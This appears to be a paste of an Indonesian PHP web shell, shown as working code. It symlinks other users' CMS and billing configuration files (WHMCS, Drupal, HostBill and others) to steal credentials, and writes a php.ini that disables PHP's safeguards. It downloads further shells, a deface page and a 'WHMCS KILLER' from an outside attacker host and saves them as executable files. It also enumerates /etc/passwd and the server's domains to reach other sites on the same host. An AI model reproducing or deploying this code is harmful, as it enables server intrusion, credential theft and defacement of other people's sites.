- @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
- @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
- @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
- @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
- @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
- @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
- @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
- @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
- @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
- @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
- @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
- @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
- @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
- @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
- @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
- @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
- @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
- @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
- @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
- @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
- @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
- @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
- @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
- @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
- @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
- }
- echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
- }
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
- ?>
- <form action="?&idb=auto" method="post">
- <?php
- echo "<form method='POST'>";
- echo "<font size='6' color='blue'><center>==================</center></font><br/>";
- echo "<div align='center'>";
- echo "<input type='submit' name='idb' value='IZIN SERVER'><br/> <br/>";
- echo "</div>";
- echo "<font size='5' color='blue'><center>==================</center></font><br/>";
- echo "<div align='center'>";
- echo "<input type='submit' name='shell' value='MASS DEFACE'> ";
- echo "<input type='submit' name='shell1' value='SHELL DM'> ";
- echo "<input type='submit' name='shell2' value='MYSQL'> ";
- echo "<input type='submit' name='shell3' value='WHMCS KILLER'> ";
- echo "<input type='submit' name='shell4' value='PHP PROXY'></p> ";
- echo "</div>";
- $sh = 'file_get_contents';
- if($_POST['idb']) {
- $ini = "php.ini";
- $open = fopen($ini, 'w');
- $source = ("safe_mode = OFF n
- disable_functions = NONE n
- safe_mode_gid = OFF n
- open_basedir = OFF n
- register_globals = ON n
- exec = ON n
- shell_exec = ON n");
- fwrite($open, $source);
- echo "<font color='lime'>";
- if($open) {
- echo '<hr><p>OK</p>';
- }
- else {
- echo "<font color='red'>";
- echo '<hr><p>NO</p>';
- echo "</font>";
- fclose($open);
- } }
- if($_POST['shell']) {
- $cgi = 'http://azzatssins.yu.tl/files/deface.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('404.html', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('404.html',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr><a href='404.html' target='_blank'>[Klick Di Sini]</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['shell1']) {
- $cgi = 'http://azzatssins.yu.tl/files/azzatssins-2.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('404.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('404.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr><a href='404.php' target='_blank'>[Klick Di Sini]</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['shell2']) {
- $cgi = 'http://azzatssins.yu.tl/files/db.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('db.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('db.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr><a href='db.php' target='_blank'>[Klick Di Sini]</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['shell3']) {
- $cgi = 'http://azzatssins.yu.tl/files/whmkiller.zip';
- $get11 = $sh($cgi);
- $idbk = fopen('kill.php', 'w');
- fwrite($idbk,$get11);
- fclose($idbk);
- {
- @chmod('kill.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr><a href='kill.php' target='_blank'>[Klick Di Sini]</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- if($_POST['shell4']) {
- $cgi = 'http://azzatssins.yu.tl/files/PHProxy.zip';
- $get11 = $sh($cgi);
- $idb1k = fopen('PHProxy.php', 'w');
- fwrite($idb1k,$get11);
- fclose($idb1k);
- {
- @chmod('PHProxy.php',0755);
- }
- echo "<font color='aqua'>";
- echo "<hr><a href='PHProxy.php' target='_blank'>[Klick Di Sini]</a></center></br>";
- echo "</font>";
- }
- echo "</font>";
- echo "<font color='blue'>";
- echo "<hr><center>Email <a href='http://azt.mobi'>azzatssinscyberserkers@gmail.com</a></center>";
- echo "<center>Mod by <a href='http://fb.com/azzatssinz'>azzatssin's</a></center>";
- echo "</font>";
- }
- ?>
- <?php
- if (isset($_GET['idb']) && ($_GET['idb'] == 'sym2')) { ?>
- <form action="?>&idb=symlink" method="post">
- <?php
- @session_start();
- @set_time_limit(0);
- @error_reporting(0);
- @ini_set('log_errors', 0);
- @ini_set('error_log', NULL);
- @ini_set('max_execution_time', 0);
- if ($win) {
- echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
- }
- @mkdir('idb2', 0777);
- $sempak = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
- $masuk = @fopen('idb2/.htaccess', 'w');
- fwrite($masuk, $sempak);
- @symlink('/', 'idb2/idb.txt');
- $pg = basename(__FILE__);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("
- ", $etc);
- if (is_readable("/etc/passwd")) {
- echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/PASSWD ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
- echo '<tr>
- <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
- <td align="center"> <font color="white"> <b>_USERS_</b></td>
- <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
- $list = scandir("/var/named");
- foreach ($etcz as $etz) {
- $etcc = explode(":", $etz);
- foreach ($list as $domain) {
- if (strpos($domain, ".db")) {
- $domain = str_replace('.db', '', $domain);
- $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
- if ($owner['name'] == $etcc[0]) {
- $i+= 1;
- echo "<tr>
- <td><a class='dm' href='http://" . $domain . " '>" . $domain . "</a></td>
- <td align='center'><font color='white'>" . $owner['name'] . "</font></td>
- <td align='center'><a href='idb2/idb.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
- }
- }
- }
- }
- flush();
- flush();
- }
- echo "</tr></table></div></html>";
- }
- ?>
Add Comment
Please, Sign In to add comment